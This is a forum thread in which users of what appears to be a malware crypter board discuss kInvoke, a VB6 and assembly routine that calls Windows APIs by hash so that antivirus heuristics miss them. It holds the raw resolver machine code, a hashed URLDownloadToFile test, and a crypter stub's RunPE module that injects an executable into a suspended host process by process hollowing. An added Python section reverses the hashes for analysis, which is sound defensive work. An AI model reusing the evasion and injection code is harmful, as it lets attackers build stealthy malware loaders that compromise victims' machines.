Topic: [ASM+VB6][INVOKE] Call APIs without declaring them - kInvoke.bas (Read 6,611 times)
nemit
Hi Karcrack. Thx for kInvoke. Everything runs fine in the code except the commented Invoke calls. Maybe you know what I'm doing wrong?

Option Explicit

Private Declare Function CryptEncrypt Lib "advapi32.dll" (ByVal hKey As Long, ByVal hHash As Long, ByVal Final As Long, ByVal dwFlags As Long, ByVal pbData As String, pdwDataLen As Long, ByVal dwBufLen As Long) As Long
Private Declare Function CryptDecrypt Lib "advapi32.dll" (ByVal hKey As Long, ByVal hHash As Long, ByVal Final As Long, ByVal dwFlags As Long, ByVal pbData As String, pdwDataLen As Long) As Long
Private Declare Function CryptHashData Lib "advapi32.dll" (ByVal hHash As Long, ByVal pbData As String, ByVal dwDataLen As Long, ByVal dwFlags As Long) As Long

Private Const PROV_RSA_AES As Long = 24
Private Const CRYPT_NEWKEYSET As Long = 8
Private Const CALG_AES_256 As Long = 26128
Private Const CALG_SHA_512 As Long = 32782
Private Const CRYPT_CREATE_SALT As Long = &H4

Private Type OSVERSIONINFO
    dwOSVersionInfoSize As Long
    dwMajorVersion As Long
    dwMinorVersion As Long
    dwBuildNumber As Long
    dwPlatformId As Long
    szCSDVersion As String * 128
End Type

Private Const sAdvapi As String = "advapi32.dll"
Private Const sKernel As String = "kernel32.dll"

Public Function EnDecodeAES(ByVal sData As String, ByVal sPassword As String, ByVal bEncrypt As Boolean) As String
    Dim hHash As Long
    Dim hKey As Long
    Dim hCryptProv As Long
    Dim lData As Long
    Dim sGetServiceProvider As String
    Dim OS As OSVERSIONINFO

    OS.dwOSVersionInfoSize = Len(OS)
    Call Invoke(sKernel, &HC75FC483, VarPtr(OS))
    If OS.dwMajorVersion & OS.dwMinorVersion >= 60 Then
        sGetServiceProvider = "Microsoft Enhanced RSA and AES Cryptographic Provider"
    Else
        sGetServiceProvider = "Microsoft Enhanced RSA and AES Cryptographic Provider (Prototype)"
    End If

    Call Invoke(sAdvapi, &H43C28BF0, VarPtr(hCryptProv), 0, StrPtr(sGetServiceProvider), PROV_RSA_AES, CRYPT_NEWKEYSET)
    Call Invoke(sAdvapi, &H43C28BF0, VarPtr(hCryptProv), 0, StrPtr(sGetServiceProvider), PROV_RSA_AES, 0&)
    Call Invoke(sAdvapi, &H4105A130, hCryptProv, CALG_SHA_512, 0, 0, VarPtr(hHash))

    'Private Declare Function CryptHashData Lib "advapi32.dll" (ByVal hHash As Long, ByVal pbData As String, ByVal dwDataLen As Long, ByVal dwFlags As Long) As Long
    'Call Invoke(sAdvapi, &HC2122629, hHash, sPassword, Len(sPassword), 0)
    ' without Invoke
    Call CryptHashData(hHash, sPassword, Len(sPassword), 0)
    Call Invoke(sAdvapi, &HC2122629, hHash, StrPtr(sPassword), Len(sPassword), 0)
    Call Invoke(sAdvapi, &HB56D274A, hCryptProv, CALG_AES_256, hHash, CRYPT_CREATE_SALT, VarPtr(hKey))

    lData = Len(sData)
    If bEncrypt Then
        sData = sData & Space(16)
        'Private Declare Function CryptEncrypt Lib "advapi32.dll" (ByVal hKey As Long, ByVal hHash As Long, ByVal Final As Long, ByVal dwFlags As Long, ByVal pbData As String, pdwDataLen As Long, ByVal dwBufLen As Long) As Long
        'Call Invoke(sAdvapi, &HD9242588, hKey, 0, 1, 0, sData, VarPtr(lData), Len(sData))
        ' without Invoke
        Call CryptEncrypt(hKey, 0, 1, 0, sData, lData, Len(sData))
    Else
        'Private Declare Function CryptDecrypt Lib "advapi32.dll" (ByVal hKey As Long, ByVal hHash As Long, ByVal Final As Long, ByVal dwFlags As Long, ByVal pbData As String, pdwDataLen As Long) As Long
        'Call Invoke(sAdvapi, &H59202584, hKey, 0, 1, 0, sData, VarPtr(lData))
        ' without Invoke
        Call CryptDecrypt(hKey, 0, 1, 0, sData, lData)
    End If

    EnDecodeAES = Left(sData, lData)
    Call Invoke(sAdvapi, &H25D4AE7A, hHash)
    Call Invoke(sAdvapi, &H95E24580, hKey)
    Call Invoke(sAdvapi, &H5AE8E894, hCryptProv, 0)
End Function
Karcrack
I'd like to see the working code without Invoke, so I'll be able to see if you're passing some pointers wrong..
Elemental Code
Why does Visual Basic hate me? Huh? I wanted to see if it would do magic against the AVs' heuristic detection and... IT DOESN'T WORK FOR ME

Call Invoke("urlmon", &H702F1A36, 0, StrPtr("http://d.imagehost.org/0187/Tron-Evolution-cover_1.jpg"), StrPtr("C:\Tron.jpg"), 0, 0)

This is a "dumb" piece of code using urlmon's URLDownloadToFile that downloads an image to disk as a test. But it neither downloads the image nor shows me any error or anything. Where did I go wrong :S?
Karcrack
Check that you are calling the Unicode version of the API... URLDownloadToFileW@URLMON... The reason you have to call the Unicode versions of the APIs is that with StrPtr() you get the pointer to the string in Unicode format... if for some reason you wanted to use the ASCII version you would have to do the conversion manually, for example with bvByteArray = StrConv(sCADENA, vbFromUnicode)

Regards
Swellow
> I've made a small update for a new RunPE module I'm working on, so here it is:
>
> 'Karcrack , 22/07/10
> Option Explicit
>
> Private Type DWORD_L
>     D1 As Long
> End Type
>
> Private Type DWORD_B
>     B1 As Byte: B2 As Byte: B3 As Byte: B4 As Byte
> End Type
>
> 'USER32
> Private Declare Function CallWindowProcW Lib "USER32" (ByVal lpCode As Long, Optional ByVal lParam1 As Long, Optional ByVal lParam2 As Long, Optional ByVal lParam3 As Long, Optional ByVal lParam4 As Long) As Long
>
> Private bInitialized_Inv As Boolean
> Private ASM_gAPIPTR(0 To 170) As Byte
> Private ASM_cCODE(0 To 255) As Byte
>
> Private Function Invoke(ByVal sDLL As String, ByVal hHash As Long, ParamArray vParams() As Variant) As Long
>     Dim vItem As Variant
>     Dim bsTmp As DWORD_B
>     Dim lAPI As Long
>     Dim i As Long
>     Dim w As Long
>
>     If Not bInitialized_Inv Then
>         For Each vItem In Array(&HE8, &H22, &H0, &H0, &H0, &H68, &HA4, &H4E, &HE, &HEC, &H50, &HE8, &H43, &H0, &H0, &H0, &H83, &HC4, &H8, &HFF, &H74, &H24, &H4, &HFF, &HD0, &HFF, &H74, &H24, &H8, &H50, &HE8, &H30, &H0, &H0, &H0, &H83, &HC4, &H8, &HC3, _
>                                 &H56, &H55, &H31, &HC0, &H64, &H8B, &H70, &H30, &H8B, &H76, &HC, &H8B, &H76, &H1C, &H8B, &H6E, &H8, &H8B, &H7E, &H20, &H8B, &H36, &H38, &H47, &H18, &H75, &HF3, &H80, &H3F, &H6B, &H74, &H7, &H80, &H3F, &H4B, &H74, &H2, &HEB, &HE7, &H89, &HE8, &H5D, &H5E, &HC3, _
>                                 &H55, &H52, &H51, &H53, &H56, &H57, &H8B, &H6C, &H24, &H1C, &H85, &HED, &H74, &H43, &H8B, &H45, &H3C, &H8B, &H54, &H5, &H78, &H1, &HEA, &H8B, &H4A, &H18, &H8B, &H5A, &H20, &H1, &HEB, &HE3, &H30, &H49, &H8B, &H34, &H8B, &H1, &HEE, _
>                                 &H31, &HFF, &H31, &HC0, &HFC, &HAC, &H84, &HC0, &H74, &H7, &HC1, &HCF, &HD, &H1, &HC7, &HEB, &HF4, &H3B, &H7C, &H24, &H20, &H75, &HE1, &H8B, &H5A, &H24, &H1, &HEB, &H66, &H8B, &HC, &H4B, &H8B, &H5A, &H1C, &H1, &HEB, &H8B, &H4, &H8B, &H1, &HE8, _
>                                 &H5F, &H5E, &H5B, &H59, &H5A, &H5D, &HC3)
>             ASM_gAPIPTR(i) = CByte(vItem)
>             i = i + 1
>         Next vItem
>         i = 0
>         bInitialized_Inv = True
>     End If
>
>     lAPI = CallWindowProcW(VarPtr(ASM_gAPIPTR(0)), StrPtr(sDLL), hHash)
>
>     If lAPI Then
>         For w = UBound(vParams) To LBound(vParams) Step -1
>             vItem = vParams(w)
>             bsTmp = SliceLong(CLng(vItem))
>             '// PUSH ADDR
>             ASM_cCODE(i) = &H68: i = i + 1
>             ASM_cCODE(i) = bsTmp.B1: i = i + 1
>             ASM_cCODE(i) = bsTmp.B2: i = i + 1
>             ASM_cCODE(i) = bsTmp.B3: i = i + 1
>             ASM_cCODE(i) = bsTmp.B4: i = i + 1
>         Next w
>         bsTmp = SliceLong(lAPI)
>         '// MOV EAX, ADDR
>         ASM_cCODE(i) = &HB8: i = i + 1
>         ASM_cCODE(i) = bsTmp.B1: i = i + 1
>         ASM_cCODE(i) = bsTmp.B2: i = i + 1
>         ASM_cCODE(i) = bsTmp.B3: i = i + 1
>         ASM_cCODE(i) = bsTmp.B4: i = i + 1
>         '// CALL EAX
>         ASM_cCODE(i) = &HFF: i = i + 1
>         ASM_cCODE(i) = &HD0: i = i + 1
>         '// RET
>         ASM_cCODE(i) = &HC3: i = i + 1
>         Invoke = CallWindowProcW(VarPtr(ASM_cCODE(0)))
>     Else
>         Invoke = -1 'Err.Raise -1, , "Bad Hash or wrong DLL"
>     End If
> End Function
>
> Private Function SliceLong(ByVal lLong As Long) As DWORD_B
>     Dim tL As DWORD_L
>     tL.D1 = lLong
>     LSet SliceLong = tL
> End Function
>
> Regards

Thanks a lot for that code Karcrack. I tried to replace my call-API-by-name with this one; I converted all API names to hashes, but then my stub gets broken. Is there anything else that has to be done?
Karcrack
Well, if you're taking the hashes correctly it must work fine... check there's no problem with DEP (Windows) or native/p-code...
Make sure you're generating the hashes using the complete function name... e.g. MessageBoxA
« Last edited: 1 November 2011, 03:53 by Karcrack »
Swellow
> Well, if you're taking the hashes correctly it must work fine... check there's no problem with DEP (Windows) or native/p-code...
> Make sure you're generating the hashes using the complete function name... e.g. MessageBoxA

I've generated the hashes correctly using each complete function name; I used the tool you shared with us. I'm on Windows 7 x64 and I'm compiling in native code. I never got CallAPIByHash working, never understood why :/ My stub was using CallAPIByName and it was working...
[L]ord [R]NA
On 64 bits maybe the hash would be different; check this with a debugger or make a program to create hashes automatically.
Swellow
> On 64 bits maybe the hash would be different; check this with a debugger or make a program to create hashes automatically.

I have no idea how to do this... Could you help me do this, please?
Karcrack
The hashes are the same... Can you post the code you're using? Maybe the problem is with DEP...
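To settle the "are the hashes the same on 64 bits?" question from the analyst's side, here is an added example in Python (not code from the thread, from kInvoke or from Karcrack's hash tool). It re-implements the hash routine that the kInvoke stub bytes carry (xor edi,edi; lodsb; test al,al; ror edi,13; add edi,eax over the ASCII bytes of the export name) and builds a reverse table from a constructed list of export names, which is how hashed API calls found in a sample are mapped back to names during triage. The export-name list and the 0xDEADBEEF miss are constructed; the two values it resolves are the stub's own LoadLibraryW push (&HEC0E4EA4 in the byte array) and the RtlMoveMemory hash from Swellow's post (&HCF14E85B).

```python
# Added example, not part of the thread: recompute and reverse the ROR13
# export-name hash used by the kInvoke stub, as an analyst would when
# de-obfuscating hashed API calls in a sample. Mirrors the stub's loop
# (xor edi,edi / lodsb / test al,al / ror edi,13 / add edi,eax).
from typing import Dict, Iterable, List, Optional, Tuple

MASK32 = 0xFFFFFFFF


def ror13_hash(name: str) -> int:
    """ROR13 hash over the ASCII bytes of an export name (no module name mixed in)."""
    h = 0
    for b in name.encode("ascii"):
        h = ((h >> 13) | (h << 19)) & MASK32   # ror edi, 13
        h = (h + b) & MASK32                   # add edi, eax
    return h


def build_lookup(export_names: Iterable[str]) -> Dict[int, str]:
    """Hash -> name table for the export names pulled from a DLL's export directory."""
    table: Dict[int, str] = {}
    for name in export_names:
        h = ror13_hash(name)
        if h in table and table[h] != name:
            # 32-bit hashes can collide; keep both candidates instead of dropping one silently
            table[h] = table[h] + "|" + name
        else:
            table[h] = name
    return table


def resolve(hashes: Iterable[int], table: Dict[int, str]) -> List[Tuple[int, Optional[str]]]:
    """Pair each hash with its export name, or None when no known export hashes to it."""
    return [(h, table.get(h)) for h in hashes]


# Constructed sample: a handful of kernel32/ntdll export names an analyst might feed in.
# In practice this list comes from the export table of the DLL being analysed.
SAMPLE_EXPORTS = [
    "LoadLibraryA", "LoadLibraryW", "GetProcAddress", "ExitProcess",
    "RtlMoveMemory", "GetModuleFileNameW", "FindResourceW", "LoadResource",
    "NtWriteVirtualMemory", "NtResumeThread",
]

# Hashes taken from the thread: the value the stub pushes before its first
# resolver call (LoadLibraryW) and the RtlMoveMemory value in Swellow's module.
THREAD_HASHES = [0xEC0E4EA4, 0xCF14E85B]


def demo() -> List[str]:
    """Resolve the thread's hashes plus one constructed miss; returns printable lines."""
    table = build_lookup(SAMPLE_EXPORTS)
    lines = []
    for h, name in resolve(THREAD_HASHES + [0xDEADBEEF], table):  # 0xDEADBEEF: constructed miss
        status = name if name else "unresolved (not in export list, or hashed with a different routine)"
        lines.append(f"0x{h:08X} -> {status}")
    return lines


if __name__ == "__main__":
    print("\n".join(demo()))
```

Because the hash depends only on the bytes of the name, it is identical on x86 and x64 machines, which is the reason the hashes come out the same. A value that stays unresolved against the DLL's real export list was either produced by a different routine or from a misspelled or incomplete name, which is the check Karcrack asked for. The table also shows at a glance whether a hash selects the A or the W variant of an export (the two LoadLibrary values differ only in the last byte), and that has to agree with how the string arguments were built (StrPtr gives Unicode, so W).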
Swellow
> The hashes are the same... Can you post the code you're using? Maybe the problem is with DEP...

I don't know with which APIs it isn't working; how do I find out? I have Invoked RunPE/Resource and a few APIs in Main:

Main Module:

'fCallAPI ("KERNEL32"), ("RtlMoveMemory"), VarPtr(bFile(0)), VarPtr(bTemp(10)), UBound(bFile)
---> fCallAPI ("KERNEL32"), (&HCF14E85B), VarPtr(bFile(0)), VarPtr(bTemp(10)), UBound(bFile)
'fCallAPI "kernel32", "GetModuleFileNameW", 0, VarPtr(bBuff(0)), 1024
---> fCallAPI "kernel32", &h45B06D8C, 0, VarPtr(bBuff(0)), 1024

Resource Module:

'hRsrc = fCallAPI(("Kernel32"), ("FindResourceW"), hMod, ResName, ResType)
---> hRsrc = fCallAPI(("Kernel32"), (&h3BD09A6B), hMod, ResName, ResType)
'hGlobal = fCallAPI(("Kernel32"), ("LoadResource"), hMod, hRsrc)
---> hGlobal = fCallAPI(("Kernel32"), (&h934E1F7B), hMod, hRsrc)
'lpData = fCallAPI(("Kernel32"), ("LockResource"), hGlobal)
---> lpData = fCallAPI(("Kernel32"), (&h9A4E2F7B), hGlobal)
'Size = fCallAPI(("Kernel32"), ("SizeofResource"), hMod, hRsrc)
---> Size = fCallAPI(("Kernel32"), (&h3F2A9609), hMod, hRsrc)
'fCallAPI ("Kernel32"), ("RtlMoveMemory"), VarPtr(B(0)), lpData, Size
---> fCallAPI ("Kernel32"), (&hCF14E85B), VarPtr(B(0)), lpData, Size
'fCallAPI ("Kernel32"), ("FreeResource"), hGlobal
---> fCallAPI ("Kernel32"), (&h54423F7C), hGlobal
'fCallAPI ("Kernel32"), ("FreeLibrary"), hMod
---> fCallAPI ("Kernel32"), (&h4DC9D5A0), hMod

And all APIs in kRunPE:

Public Function fInjectExe(ByRef bvBuff() As Byte, ByVal sHost As String, Optional ByVal sParams As String, Optional ByRef hProcess As Long) As Long
    Dim hModuleBase As Long
    Dim hPE As Long
    Dim hSec As Long
    Dim ImageBase As Long
    Dim gNumC As Long
    Dim tSTARTUPINFO(16) As Long
    Dim tPROCESS_INFORMATION(3) As Long
    Dim tCONTEXT(50) As Long
    Dim KERNEL32 As String
    Dim NTDLL As String

    KERNEL32 = "KERNEL32"
    NTDLL = "NTDLL"

    hModuleBase = VarPtr(bvBuff(0))
    If Not GetNumb(hModuleBase, fClngW("2")) = fClngW("&H5A4D") Then Exit Function
    hPE = hModuleBase + GetNumb(hModuleBase + fClngW("&H3C"))
    If Not GetNumb(hPE) = fClngW("&H4550") Then Exit Function
    ImageBase = GetNumb(hPE + fClngW("&H34"))

    tSTARTUPINFO(0) = fClngW("&H44")
    'CreateProcessW
    Call fCallAPI(KERNEL32, &H16B3FE88, 0, StrPtr(sHost), 0, 0, 0, fClngW("&H4"), 0, 0, VarPtr(tSTARTUPINFO(0)), VarPtr(tPROCESS_INFORMATION(0)))
    'NtUnmapViewOfSection
    Call fCallAPI(NTDLL, &HF21037D0, tPROCESS_INFORMATION(0), ImageBase)
    'NtAllocateVirtualMemory
    Call fCallAPI(NTDLL, &HD33BCABD, tPROCESS_INFORMATION(0), VarPtr(ImageBase), 0, VarPtr(GetNumb(hPE + fClngW("&H50"))), fClngW("&H3000"), fClngW("&H40"))
    'NtWriteVirtualMemory
    Call fCallAPI(NTDLL, &HC5108CC2, tPROCESS_INFORMATION(0), ImageBase, VarPtr(bvBuff(0)), GetNumb(hPE + fClngW("&H54")), 0)

    For gNumC = 0 To GetNumb(hPE + fClngW("&H6"), fClngW("2")) - fClngW("1")
        hSec = hPE + fClngW("&HF8") + (fClngW("&H28") * gNumC)
        'NtWriteVirtualMemory
        Call fCallAPI(NTDLL, &HC5108CC2, tPROCESS_INFORMATION(0), ImageBase + GetNumb(hSec + fClngW("&HC")), hModuleBase + GetNumb(hSec + fClngW("&H14")), GetNumb(hSec + fClngW("&H10")), 0)
    Next gNumC

    tCONTEXT(0) = fClngW("65543")
    'NtGetContextThread
    Call fCallAPI(NTDLL, &HE935E393, tPROCESS_INFORMATION(1), VarPtr(tCONTEXT(0)))
    'NtWriteVirtualMemory
    Call fCallAPI(NTDLL, &HC5108CC2, tPROCESS_INFORMATION(0), tCONTEXT(41) + fClngW("&H8"), VarPtr(ImageBase), fClngW("&H4"), fClngW("0"))
    tCONTEXT(44) = ImageBase + GetNumb(hPE + fClngW("&H28"))
    'NtSetContextThread
    Call fCallAPI(NTDLL, &H6935E395, tPROCESS_INFORMATION(1), VarPtr(tCONTEXT(0)))
    'NtResumeThread
    Call fCallAPI(NTDLL, &HC54A46C8, tPROCESS_INFORMATION(1), 0)

    hProcess = tPROCESS_INFORMATION(0)
    fInjectExe = fClngW("1")
End Function

Private Function GetNumb(ByVal lPtr As Long, Optional ByVal lSize As Long = &H4) As Long
    'NtWriteVirtualMemory
    Call fCallAPI("NTDLL", &HC5108CC2, -1, VarPtr(GetNumb), lPtr, lSize, 0)
End Function
« Last edited: 1 November 2011, 19:19 by Swellow »
Karcrack
The code is pretty confusing... it's hard to follow the calls without looking at the original API declarations or the structure declarations... anyway, it looks like you're passing the pointers incorrectly... can't help you much more... you should look at the functions' return values... using MsgBox() is the easiest way.. also the worst